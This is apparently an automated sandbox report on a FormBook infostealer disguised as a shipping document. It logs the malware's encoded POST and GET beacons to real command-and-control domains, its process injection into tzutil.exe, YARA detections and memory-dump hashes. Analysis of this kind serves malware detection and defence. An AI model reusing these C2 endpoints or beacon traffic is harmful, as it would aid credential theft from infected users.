                                                  Cache-Control: max-age=0
                                                  Referer: http://www.expancz.top/2gcl/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Data Ascii: jHm4GXr=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC0yZQ2moYdB6JFlt6SXwwT0jqxcc2JtnQ==
Timestamp: Dec 10, 2024 14:22:29.647928953 CET | Bytes transferred: 697 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:29 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 552
                                                  Connection: close
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 2 | Source IP: 192.168.2.11 | Source Port: 49914 | Destination IP: 107.155.56.30 | Destination Port: 80 | PID: 732 | Process: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
Timestamp: Dec 10, 2024 14:22:30.905369997 CET | Bytes transferred: 826 | Direction: OUT | Data:
POST /2gcl/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.expancz.top
                                                  Origin: http://www.expancz.top
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 224
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.expancz.top/2gcl/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Data Ascii: jHm4GXr=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjb23MQsVHsk8dIXRGBQolc/f3UWyp+zbHI=
Timestamp: Dec 10, 2024 14:22:32.432938099 CET | Bytes transferred: 697 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:32 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 552
                                                  Connection: close
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 3 | Source IP: 192.168.2.11 | Source Port: 49921 | Destination IP: 107.155.56.30 | Destination Port: 80 | PID: 732 | Process: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
Timestamp: Dec 10, 2024 14:22:33.582700014 CET | Bytes transferred: 1839 | Direction: OUT | Data:
POST /2gcl/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.expancz.top
                                                  Origin: http://www.expancz.top
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 1236
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.expancz.top/2gcl/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Data Ascii: jHm4GXr= [TRUNCATED]
Timestamp: Dec 10, 2024 14:22:35.131866932 CET | Bytes transferred: 697 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:34 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 552
                                                  Connection: close
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 4 | Source IP: 192.168.2.11 | Source Port: 49928 | Destination IP: 107.155.56.30 | Destination Port: 80 | PID: 732 | Process: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
Timestamp: Dec 10, 2024 14:22:36.302843094 CET | Bytes transferred: 543 | Direction: OUT | Data:
GET /2gcl/?jHm4GXr=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZfz0RhpRCYzUVnPO/bDdiFFJaWY/Yn51Jw=&2z=xX0xzrrpPjmP HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Host: www.expancz.top
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Timestamp: Dec 10, 2024 14:22:37.852586985 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:37 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 9651
                                                  Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  ETag: "6736b650-25b3"
                                                  Accept-Ranges: bytes
                                                  Data Ascii: ><script>if(localStorage.source === sourceData.facebookSource) { ! function (f, b, e, v, n, t, s) { if (f.fbq) return; n = f.fbq = function () { n.callMethod ? n.callMethod.apply(n, argu
                                                  Dec 10, 2024 14:22:37.852854967 CET1236INData Raw: 6e 63 65 73 22 2c 20 22 64 65 62 75 67 22 2c 20 22 6f 6e 22 2c 20 22 6f 66 66 22 2c 20 22 6f 6e 63 65 22 2c 20 22 72 65 61 64 79 22 2c 20 22 61 6c 69 61 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 67 72 6f 75 70 22 2c 20 22 65 6e 61 62 6c 65 43
                                                  Data Ascii: nces", "debug", "on", "off", "once", "ready", "alias", "group", "enableCookie", "disableCookie" ], ttq.setAndDefer = function(t, e) { t[e] = function() { t.push([e].concat(Array.prototype.slice.call(argu
                                                  Dec 10, 2024 14:22:37.852868080 CET1236INData Raw: 20 74 74 71 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 74 72 61 63 6b 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 67 48 65 61 64 20 3d 20 64
                                                  Data Ascii: ttq = { track: function () {} } }</script><script>var gHead = document.getElementsByTagName('head')[0]; var gScript = document.createElement("script"); gScript.type = "text/javascript"; gScript.src="https://www.g
                                                  Dec 10, 2024 14:22:37.852880001 CET1026INData Raw: 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 2f 2f 20 e9 98 bb e6 ad a2 e5 8f 8c e5 87 bb e6 94 be e5 a4 a7 0a 20 20 20 20 20 20 76 61 72 20 6c 61 73 74 54 6f 75 63 68 45 6e 64 20 3d 20 30 3b 0a 20 20 20 20
                                                  Data Ascii: ndow.onload = function () { // var lastTouchEnd = 0; document.addEventListener('touchstart', function (event) { if (event.touches.length > 1) { event.preventDefault(); } });


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  5 | 192.168.2.11 | 49947 | 13.228.81.39 | 80 | 732 | C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Dec 10, 2024 14:22:44.137403011 CET | 833 | OUT | POST /y49d/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.taxiquynhonnew.click
                                                  Origin: http://www.taxiquynhonnew.click
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 204
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Data Ascii: jHm4GXr=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQkEXV4LfvXC5GHSIir/SqhdUFffwg7hAKrA==
                                                  Dec 10, 2024 14:22:45.709861994 CET | 371 | IN | HTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Tue, 10 Dec 2024 13:22:45 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  6 | 192.168.2.11 | 49954 | 13.228.81.39 | 80 | 732 | C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Dec 10, 2024 14:22:46.811913967 CET | 853 | OUT | POST /y49d/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.taxiquynhonnew.click
                                                  Origin: http://www.taxiquynhonnew.click
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 224
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Data Ascii: jHm4GXr=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOcHL5RQyQlDwHtHSsVMoGtlbpIC1Tibp/I=


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  7 | 192.168.2.11 | 49961 | 13.228.81.39 | 80 | 732 | C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Dec 10, 2024 14:22:49.478758097 CET | 1866 | OUT | POST /y49d/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.taxiquynhonnew.click
                                                  Origin: http://www.taxiquynhonnew.click
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 1236
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Dec 10, 2024 14:22:51.057413101 CET | 371 | IN | HTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Tue, 10 Dec 2024 13:22:50 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  8 | 192.168.2.11 | 49969 | 13.228.81.39 | 80 | 732 | C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Dec 10, 2024 14:22:52.133733988 CET | 552 | OUT | GET /y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Host: www.taxiquynhonnew.click
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Dec 10, 2024 14:22:53.708259106 CET | 516 | IN | HTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Tue, 10 Dec 2024 13:22:53 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>



                                                  Target ID: 0
                                                  Start time: 08:20:55
                                                  Start date: 10/12/2024
                                                  Path: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"
                                                  Imagebase: 0xec0000
                                                  File size: 876'544 bytes
                                                  MD5 hash: 1175234DABBEAB0E4A9EE04802EF57FA
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Reputation: low
                                                  Has exited: true

                                                  Target ID: 3
                                                  Start time: 08:20:59
                                                  Start date: 10/12/2024
                                                  Path: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"
                                                  Imagebase: 0xc90000
                                                  File size: 876'544 bytes
                                                  MD5 hash: 1175234DABBEAB0E4A9EE04802EF57FA
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation: low
                                                  Has exited: true

                                                  Target ID: 5
                                                  Start time: 08:21:47
                                                  Start date: 10/12/2024
                                                  Path: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: "C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe"
                                                  Imagebase: 0x20000
                                                  File size: 140'800 bytes
                                                  MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges: false
                                                  Has administrator privileges: false
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation: high
                                                  Has exited: false

                                                  Target ID: 6
                                                  Start time: 08:21:49
                                                  Start date: 10/12/2024
                                                  Path: C:\Windows\SysWOW64\tzutil.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: "C:\Windows\SysWOW64\tzutil.exe"
                                                  Imagebase: 0xf50000
                                                  File size: 48'640 bytes
                                                  MD5 hash: 31DE852CCF7CED517CC79596C76126B4
                                                  Has elevated privileges: false
                                                  Has administrator privileges: false
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation: moderate
                                                  Has exited: false

                                                  Target ID: 9
                                                  Start time: 08:22:02
                                                  Start date: 10/12/2024
                                                  Path: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: "C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe"
                                                  Imagebase: 0x20000
                                                  File size: 140'800 bytes
                                                  MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges: false
                                                  Has administrator privileges: false
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation: high
                                                  Has exited: false

                                                  Target ID: 11
                                                  Start time: 08:22:15
                                                  Start date: 10/12/2024
                                                  Path: C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit): false
                                                  Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase: 0x7ff6de060000
                                                  File size: 676'768 bytes
                                                  MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges: false
                                                  Has administrator privileges: false
                                                  Programmed in: C, C++ or other language
                                                  Reputation: high
                                                  Has exited: true


                                                    Execution Graph

                                                    Execution Coverage: 9.7%
                                                    Dynamic/Decrypted Code Coverage: 100%
                                                    Signature Coverage: 0%
                                                    Total number of Nodes: 187
                                                    Total number of Limit Nodes: 10
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (o_q$(o_q$,cq$,cq$Hcq
                                                    • API String ID: 0-4110691418
                                                    • Opcode ID: 3ffe8c2a9773f21f3f045b2bdbf3c8fd99718ac834eda2a941a615487b52b902
                                                    • Instruction ID: ea97049b5db8b01bdf5f99b42712d643e16751b215c50f91a69a10a28b69f822
                                                    • Opcode Fuzzy Hash: 3ffe8c2a9773f21f3f045b2bdbf3c8fd99718ac834eda2a941a615487b52b902
                                                    • Instruction Fuzzy Hash: 9C526D35A00115DFCB18DF69D8A4A6DBBB2FF88390B15916EE906DB364DB31EC41CB90

                                                    Control-flow Graph

                                                    control_flow_graph 697 31b3e34-31b6fc2 700 31b6fc9-31b7153 call 31b5c74 call 31b5c84 call 31b5c94 call 31b5ca4 call 31b01f8 * 4 697->700 701 31b6fc4 697->701 733 31b7160-31b7247 700->733 734 31b7155-31b715b 700->734 701->700 747 31b724f 733->747 735 31b7252-31b725f 734->735 747->735
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `Ycl$t^cl
                                                    • API String ID: 0-2306952220
                                                    • Opcode ID: 43d8e0e2eeb48f350e0d9b5566af79f7ff66e054cc14f93296d5b85f1b1d8238
                                                    • Instruction ID: dc1bd6e78c63e6c3ba0c4f41aabc2ff10b43e5058c9e0db3e7d01b0a8fc5557b
                                                    • Opcode Fuzzy Hash: 43d8e0e2eeb48f350e0d9b5566af79f7ff66e054cc14f93296d5b85f1b1d8238
                                                    • Instruction Fuzzy Hash: 1281A274E00209DFDB08DFA9D994AEEBBB6FF88300F108529E419AB368DB355945CF51

                                                    Control-flow Graph

                                                    control_flow_graph 866 31b6f90-31b6fc2 867 31b6fc9-31b701f call 31b5c74 call 31b5c84 866->867 868 31b6fc4 866->868 876 31b702a-31b704d call 31b5c94 call 31b5ca4 867->876 868->867 880 31b7052-31b7153 call 31b01f8 * 4 876->880 900 31b7160-31b722e 880->900 901 31b7155-31b715b 880->901 913 31b7238-31b7247 900->913 902 31b7252-31b725f 901->902 914 31b724f 913->914 914->902
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `Ycl$t^cl
                                                    • API String ID: 0-2306952220
                                                    • Opcode ID: 360745e619b0eab6643bf03143afd6807b12ac75a3c1f796da34c7aaa18bad5f
                                                    • Instruction ID: c984dbca4563921c3bd1ada90be8def2ec6c28b5eb72d2bfa75cea6c7b271d1e
                                                    • Opcode Fuzzy Hash: 360745e619b0eab6643bf03143afd6807b12ac75a3c1f796da34c7aaa18bad5f
                                                    • Instruction Fuzzy Hash: 0951D474E012099FCB08DFA9D990AEEBBB2FF89300F14816AD415AB368DB345905CF90

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d
                                                    • API String ID: 0-2564639436
                                                    • Opcode ID: daee220b92450b90131e8ee5c6b03d27023e5028c01f260e35aee760d4183d52
                                                    • Instruction ID: 2aabd557c2b502a69a0123be08d54581bafef18ebd90ca24e4a2d57991bc7dea
                                                    • Opcode Fuzzy Hash: daee220b92450b90131e8ee5c6b03d27023e5028c01f260e35aee760d4183d52
                                                    • Instruction Fuzzy Hash: C462EE74E05229CFDB24DF69C994BDEBBB2BB89300F1091E9D409A7254DB34AE85CF50

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D
                                                    • API String ID: 0-2746444292
                                                    • Opcode ID: 8205cb1be00da0ad96f7012268d736cd92bac917d90684fe53c296d8953bda24
                                                    • Instruction ID: e5bf0b21922b77a7f2e7cedacb93620e39fb5b97548211e367e7af169e18d652
                                                    • Opcode Fuzzy Hash: 8205cb1be00da0ad96f7012268d736cd92bac917d90684fe53c296d8953bda24
                                                    • Instruction Fuzzy Hash: 8452B674A012198FCB54DF68C998A9DBBB6FF89300F1081D9D50DAB365DB31AE85CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31f690415c760769ece644b056c57b4905c2b141afc7bc3f9004a92c3d03f807
                                                    • Instruction ID: c2c53938c62c9b8126d799f201321fb7eec8c25ea907d1ff904be37045e935a2
                                                    • Opcode Fuzzy Hash: 31f690415c760769ece644b056c57b4905c2b141afc7bc3f9004a92c3d03f807
                                                    • Instruction Fuzzy Hash: 8FC1BEF0B01705AFDB26EB75C8507AAB7F6AF89340F18846DD1468B390DB74E901CB51

                                                    Control-flow Graph

                                                    control_flow_graph 527 31bd570-31bd60f GetCurrentProcess 531 31bd618-31bd64c GetCurrentThread 527->531 532 31bd611-31bd617 527->532 533 31bd64e-31bd654 531->533 534 31bd655-31bd689 GetCurrentProcess 531->534 532->531 533->534 535 31bd68b-31bd691 534->535 536 31bd692-31bd6ad call 31bd75a 534->536 535->536 540 31bd6b3-31bd6e2 GetCurrentThreadId 536->540 541 31bd6eb-31bd74d 540->541 542 31bd6e4-31bd6ea 540->542 542->541
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 031BD5FE
                                                    • GetCurrentThread.KERNEL32 ref: 031BD63B
                                                    • GetCurrentProcess.KERNEL32 ref: 031BD678
                                                    • GetCurrentThreadId.KERNEL32 ref: 031BD6D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 634f492409ff96d8a51ea0f985be8794e0bcee7da2c0c3d845a4637bbdbc28e7
                                                    • Instruction ID: a003b79768e7fad667da58f2309b9ce5d40946e1a5b8b34a4c7d2d59df6fe7f8
                                                    • Opcode Fuzzy Hash: 634f492409ff96d8a51ea0f985be8794e0bcee7da2c0c3d845a4637bbdbc28e7
                                                    • Instruction Fuzzy Hash: 175165B09003498FDB48DFA9D688BDEBBF5EF48314F248459E419B72A0D7345984CF65

                                                    Control-flow Graph

